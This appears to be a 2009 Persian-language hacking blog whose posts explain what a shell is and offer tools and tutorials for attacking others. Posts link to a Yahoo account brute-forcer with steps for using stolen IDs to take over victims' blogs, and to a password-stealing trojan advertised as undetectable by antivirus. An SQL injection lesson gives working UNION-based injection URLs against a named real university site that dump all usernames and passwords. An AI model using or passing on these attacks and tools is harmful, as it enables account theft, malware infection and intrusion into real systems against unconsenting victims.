๑۩۞۩๑ وحشتستان๑۩۞۩๑ هك آيدي - هك وبلاگ

shell چیست؟

user2 — Thu, 05 Nov 2009 16:50:53 GMT

shell چیست؟

سلام دوستان عزیزم .

در این پست قصد دارم شما رو با زبانی خیلی ساده و روان شما رو با شل (shell) ها اشنا کنم البته این رو بگم که شل رو با شلر های php   مثل c99   اشتباه نگیرید . !

قبل از شروع کار بگم که شل به معنای پوسته هست . و معمولا با علامت مخفف .sh   نشون میدن .

شاید تا به حال شماکلمه شل (shell) رو زیاد شنیده باشید ولی نمیدونید که اصلا یعنی چی ؟؟؟

ببینید دوستان شما هر کاری توی ویندوز یا توی هر سیستم عاملی (لینوکس , سلاریس و ..) که انجام میدید به صورت زبان دو دویی در میاد یا همون صفر و یک در میاد بعد به هسته سیستم عامل میخوره بعد به حافظه و بعد اجرا میشه مثلا فرض کنید که میرید توی cmd   و میزنید dir   خوب معلوم هست که این دستور محتویات یک دایرکتوری رو نشون میشه در واقع این دستور ابتدا به صورت صفر و یک در میاد و بعد اجرا میشه .

اون چیزی که دستورات شما رو میگیره و تبدیل به صفر و یک میکنه و اون رو به سمت کرنل سیستم عامل میفرسته همون شل (shell) هست !!!

حالا فرض کنید که اصلا چیزی در سیستم های عامل به اسمه شل وجود نداره اونوقت می فهمید که چه قدر کار با کامپیوتر دردسر ساز و سخت بود . مثلا برای اجرای همین دستور dir   باید مقادیر زیادی از صفر و یک رو میزدید یا زبان های سطح پایین مثله اسمبلی و hex   رو بلد بودید !!! .

اما یه نکته خیلی مهمی که در شل ها حائز اهمیت هست فرق اون ها هست مثلا شلری که در ویندوز استفاده میشه فرق میکنه با شلره سیستم عامل لینوکس .

اون شلی که در ویندوز استفاده میشه command.com   هست (همون cmd   رو میگم) و شلی که در سیستم عامل لینوکس به کار گرفته میشه شله bash   هست که در پوشه bin   ذخیره شده . و البته شل های دیگری هم وجود دارن مثله ksh (freebsd) و csh   که در سیستم عامل unix system v   استفاده میشه .

یک شل خوب چه ویژگی هایی داره ؟؟؟

اگه نظره منو بخاین من شل لینوکس رو بیشتر خاطرشو میخام تا ویندوز (البته این نظر رو از لحاظ هکری میگم )

چون که شل لینوکس از کامپایلر و دیباگر و ... خیلی خوبی بهرمند هست و این چیزی هست که در ویندوز نیست مثلا کامپایلر gcc   در لینوکس قابلیت خیلی زیادی داره و در ضمن در عین قدیمی بودن خیلی هم قوی هست !!

کلا یه شل خوب باید برنامه های زیر رو ساپورت کنه ::

Netstat     برای دیدن سوکت ها .

Gcc          برای کامپایل کردن زبان c

Lynx        یکی از browser های خیلی معتبر و عالی

telnet       برای ارتباط به پورت ها و ....

dig           این یکی رو کمتر شلی داره یا این که پولیه !!!

ftp            برای تبادل اطلاعات !

Finger     این یکی هم اطلاعات رو از کاربر میگیره .

چگونه میتونیم یه شل لینوکسی در ویندوز داشته باشیم ؟؟؟

شما میتونید برای این کار از برنامه cygwin   استفاده کنید . اون رو نصب کنید و بعد دستورات خودتون رو مثلا ls – la رو اجرا کنید !!! خیلی برنامه عجیبی هست و میتونید همه اون برنامه هایی که در لینوکس فقط قابل اجرا هستن رو اجرا کنید مثلا اون برنامه هایی که با پسونده .sh   هستن . البته اگه یه نسخه کامل از این برنامه رو گیر اوردین یکی هم برای من بفرسیتید !!

البته بعضی از isp ها خیلی لازج بازی در میارن و یعضی وقت ها اکانت شل رو به مشتری هاشون میدن برای اطلاعات بیشتر به isp   خودتون تماس بگیرید بعد ازشون بپرسید .

و بسیاری از راه های دیگه هم هست که این جا , جای توضیح اون ها نیست .

ایا باید با زبان شل ها رو بلد باشم ؟؟؟

در جواب باید بگم که یاد گرفتن زبان شل هایی مثله command.com   یا   bash از نون شب هم واجب تره !

البته شل bash   به خاطر امکانات بیشتری که داره کار باهاش هم سخت تره و همچینین دستورات و فرامین بیشتری رو در خود جا داده .

بدیهی هست که دستورات شل ها مختلف هست مثلا در command.com   از   دستور ver   برای دیدن مشخصات سیستم عامل بکار میره ولی همین دستور در لینوکس و در شلر اون که bash   هست دستور uname –a   استفاده میشه .

ولی در اکثر جا ها خیلی با هم فرق ندارن مثلا دستورات در لینوکس و سلاریس تقریبا یکی هست !!

خوب این ها هم خلاصه ای از اطلاعات من بود درباره شل ها امیدوارم که مفید واقع شده باشه و تونسته باشم که اطلاعاتی خوبی به شما داده باشم .

موفق باشید .

مرجع كامل ضد امنيت شبكه

user1 — Wed, 04 Nov 2009 12:13:43 GMT

سلاملیکم یک کتاب درست درمون براتون گزاشتم تا دانلود کنید و حالش و ببرید

مرجع كامل ضد امنيت شبكه

این کتاب در 1224 صفحه آماده شده است . نویسنده سعی بسیاری انجام داده است که با استفاده از منابع معتبر انگلیسی و فارسی ، اين کتاب را بدون اشتباه تکنیکی به شما ارایه دهد و تمامی مطالب اکثرا مستند هستند .

روند نگارش کتاب کاملا قابل دفاع است و هیچگونه خدشه ای در این باره وارد نیست . این كتاب ثمره كوشش آقای امیر آشتیانی (ZXO003) و دوستان ديگه هست و .... کتاب دارای 21 فصل هست ....

توجه : قابل ذکر است که برای مشاهده کتاب حتما باید از نسخه 7 از Adobe Acrobat استفاده کنید .

برخي فصول كتاب به شرح زير است :

فصل اول : معرفی کوتاه پروتکل TCP/IP ( پیش نیاز ) .

فصل دوم : معرفی پروتکل HTTP و جزئیات کار آن .

فصل سوم : معرفی پروتکل FTP و جزئیات کار آن .

فصل چهارم : مروری بر مبنی سیستم عامل Windows و شبکه.

فصل پنجم : مروری بر سیستم عامل خانواده Linux .

فصل ششم : معرفی انواع IDS ها و راه های فرار از دست آنها و معرفی Honey Pot.

فصل هفتم : معرفی انواع Firewall ها

فصل هشتم : انواع حملات به ماشینهای شبکه و اهداف آن .

فصل نهم : جمع آموری اطلاعات اولیه از هدف .

......................... دانلود و بقیه ی توضیحات در ادامه ی مطلب

نظر فراموش نشه

برنامه ی فوق العاده قوی omega برای هک آیدی (تست شده و 100% عملی)

user1 — Wed, 04 Nov 2009 12:06:14 GMT

با این برنامه شما می توانید هر چند آیدی که می خواهید را تایپ کنید و سپس مثلاً ده پسورد را به انتخاب خود وارد کنید و دکمه start را بزنید تا همه آیدی ها با یکی یکی از پسورد ها چک شود واگر آیدی با پسورد همخوانی کرد برای شما save می شود و اگر خوش شانس با شید در عرض 15 دقیقه چند آیدی را هک خواهید کرد ( توجه داشته باشید که پسورد های متنوع را امتحان کنید ) ضمناً برای اطمینان آن را با آیدی خود امتحان کنید.

مزیت این برنامه این است که شما می توانید با هک آیدی کسی که وبلاگ دارد وبلاگ او را هم هک کنید یعنی وقتی وارد آیدی شخص شدید در بلاگفا نام کاربری فرد را نوشته و بر روی قسمتی که مربط به کسانی است که پسورد را فراموش کرده اند کلیک کنید و می بینید که رمز وبلاگ به آیدی فرستاده میشود.

«این وبلاگ هیچگونه مسؤلیتی در قبال استفاده نادرست افراد از این برنامه ندارد.»

نکته : همانطور که می دانید اکثر برنامه های هک آغشته به ویروس است شما این برنامه رو بر روی سیستم های قدیمی یا خراب اجرا کنید ؛ اگر آنتی ویروس دارید غیر فعالش کنید سپس بوسیله برنامه Winrar رو فایل پسورد بزارید بعد آنتی ویروس تون رو فعال کنید.

دانلود
http://rgb4you.persiangig.com/alikhatar/hack/omega..zip

نظر یادتون نره

هک تو یاهو

vahshatestan — Wed, 04 Nov 2009 12:03:52 GMT

سلام دوستان این هم آموزش به همراه برنامه برای هک کردن سیستم دیگران.

http://hamedhaker.persiangig.com/Vahshatestan.rar لینک دانلود.

ارسال پسود یاهو ورژن 8 . 9 . 10

user1 — Wed, 28 Oct 2009 11:10:18 GMT

سلام خدمت همه دوستان

به علت کمبود تروجان تصمیم گرفتم یه پسورد سندر براتون بزارم

قابلیت ها :
ارسال پسود یاهو ورژن 8 . 9 . 10
شناسایی نشدن توسط هیچ انتی ویروس در دنیا
حجم سرور 36 KB
ارسال پسورد به Inbox

قابلیت مهم :

دوستان در تمامی تروجان ها و پسورد سندر هایی که تا به حال دیدید قربانی باید بعد از اینکه سرور رو اجرا کرد انلاین بشه تا پسورد ارسال بشه اما در این پسورد سندر اگر قربانی آنلاین باشه به محض اینکه سرور رو اجرا کرد پسورد یاهو ارسال میشود . (چک شده بر روی یاهو 10)

دانلود

لینک اسکن فایل سرور اسکن فایل سرور

لینک دانلود برنامه دانلود

در صورتی که برنامه اجرا نشد این فایل رو دانلود کنید و بر روی Register OCX کلیک کنید

دانلود

آموزش کامل sql-injection

vahshatestan — Sun, 25 Oct 2009 11:21:14 GMT

سلام دوستان

انشاءالله از امروز شروع میکنیم به کار

آموزش اول : SQLI

توضیح : sql مخفف Structure query language هست یعنی زبانی که ساختارش به صورت پرس و جو هست

این زبان دستورات زیادی نداره و برنامه نویسا برای اینکه کارشون برای نوشتن برنامه های تحت وب آسون بشه ازش استفاده میکنن

مثلا در همین قسمت ثبت و نام و بخش کاربری به جای اینکه برنامه نویس به ازای هر کاربر یه فایل درست کنه و هر وقت کاربر وارد میشه یا بخش خودشو تغییر میده بیاد فایلو ویرایش کنه (به حجمش اضافه کنه یا کم کنه) میاد به راحتی با برقراری ارتباط بین زبان برنامه نویسیش (php یا ..) با پایگاه داده ارتباط برقرار میکنه و اون رو آپدیت میکنه !

اصطلاحات زیر رو باید بلد باشید :

DATABASE : یا پایگاه داده که تمامی تیبل های یوزر در اون ذخیره میشن
table : در این زبان به تعداد ستون که وجود داره میگن ، یک اصطلاحی من دارم که مثلا در یک پوشه تعدادی پوشه دیگه وجود داره و در پوشه های دیگه تعدادی فایل ، ما به اون پوشه اولی و اصلی میگیم database و به پوشه های داخل اون میگیم TABLE و فایل هایی که در TABLE هست میگیم COLUMN پس با این مثال دیگه column هم تعریف شد !

این زبان تعدادی دستور هم دارن که خیلی به کار میان :
فقط برای آشنایی تعدادیشون رو میگم : SELECT , UPDATE , DELET , INSERT

یه چیز مهم دیگه یادم رفت :
ما زبان های به اصطلاح SQL زیادی داریم که هر کدومش برای یه سیستم عامل یا یه زبان برنامه نویسی بیشتر به کار میرن ، عمده تریناشون اینان : mysql , mssql , postegre , ..

که mysql برای php و linux کاربرد بیشتری داره
mssql هم برای win هست برای زبان های asp و asp.net(aspx)

این دوتا برای ما مهمن بقیه زیاد برای ما اهمیتی ندارن

و هدف این بخش هم آموزش inj در این دوتاس !

در درس های بعدی هدف inj و ویژگی های mysql رو بهش میپردازیم

یا حق

vahshatestan — Sun, 25 Oct 2009 11:19:44 GMT

سلام دوستان امید وارم که حالتون خوب باشه
یه فیلم آموزشی در سطح مبتدی که دوست خوبم بهزاد ساخته میزارم. تا استفاده کنین نظر یادتون نره.

دانلود فیلم

انواع هکرها و حمله ها

user1 — Wed, 21 Oct 2009 15:26:23 GMT

درود

میخوایم با چگونگی حمله ها و گروه های هکر ها آشنا تون کنیم پس خوب دقت کنید

یه کمی زیاده گزاشتمش تو ادامه مطلب برید اونجا و بخونیدش

گروه نفوذگران کلاه سفيد گروه نفوذگران کلاه سياه گروه نفوذگران کلاه خاکستري گروه نفوذگران کلاه صورتي

همكاري

vahshatestan — Mon, 19 Oct 2009 08:05:18 GMT

سلام

دوستان عزیز من به چند همکار نیاز دارم تا در اداره وبلاگ به من کمک کنن.

حالا شاید بعدا تیم هم زدیم :دی

کسانی که مایل به همکاری هستن میتونن در بخش نظرات همین پست اعلام کنن.

sql2

vahshatestan — Tue, 21 Jul 2009 14:38:18 GMT

سلام دوستان عزیز .ببخشید که چند روزی نبودم .

همون طور که گقته بودم امروز هم قسمت دوم آموزش sql injection رو میگم .

تو این آموزش میخوام با یک مثال پیش بریم .پس لطفا به سایت آسیب نزنید .

سایت هدف ما : www.computersr.com (مال دانشگاه آزاد هست)

اگه وارد سایت بالا بشیم و روی یکی از لینکها کلیک کنیم .در انتهای لینکمون یک آیدی میاد و اگه جلوش یک کاراکتر غیر مجاز مثل ' بزاریم سایت ارور میده.

همون طور که در درس قبلی گفتم , اگر سایت ارور بده یعنی میشه هکش کرد .تو این سایت هم ارور داد .

لینک ارور= www.computersr.com/newsItem.php?id=277'

حالا طبق درس قبلی میاییم و با دستور order+by تعداد کالومن ها رو میاریم بیرون .

همان طور که گفته بودم غمل میکنم .: www.computersr.com/newsItem.php?id=-277+order+by+1--

خوب حالا اون عدد آخر که در بالا من یک دادم رو میبریم بالا تا جایی که ارور بده .که در این مثال اگر به جای یک 8 بدیم ارور میده سایت .

ولی اگر 7 بدیم سایت بدون هیچ اروری بالا میاد . پس تعداد کالومن این سایت 7 تا هست . حالا میایم و از دستور union +select استفاده میکنیم.

که میشه این : www.computersr.com/newsItem.php?id=-277+union+select+all+1,2,3,4,5,6,7--

همون طور که میبینید سایت به ما عدد 3 رو نشون میده .یعنی user و pass تو این کالومن هست .

حالا باید تیبیلی که userو pass توش هست رو حدس بزنیم . که در اینجا اسم تیبیل مورد نظر ما user هست . که باید با دستور from بازش کنیم .

که میشه اینجوری: www.computersr.com/newsItem.php?id=-277+union+select+all+1,2,3,4,5,6,7+from+user

خوب حالا باید به جای 3 اسم کالومن یوزر و پسورد رو بنویسیم . که در اینجا ما میخواهیم تمام یوزر و پسوردها رو بدست بیاریم و از دستور group_concat استفاده میکنیم.

که میشه اینجوری: www.computersr.com/newsItem.php?id=-277+union+select+all+1,2,group_concat(username,0x3a,password),4,5,6,7+from+user

حالا میپرسین که این 0x3a چی هست که نوشتی ؟ این دستور باعث میشه که بین یوزر و پسورد علامت : قرار بگیره و قاطی نشن.

اگر مشکلی داشتین تو نظرات بگین و من در اولین فرصت تو نظرات جوابش رو میگم .

و اگه خواستین بگین تا من مثالهای زیادتری بگم تا متوجه بشین . در پایان دوباره میگم لطفا به سایتی که در مثال گفته میشه آسیب نرسانید.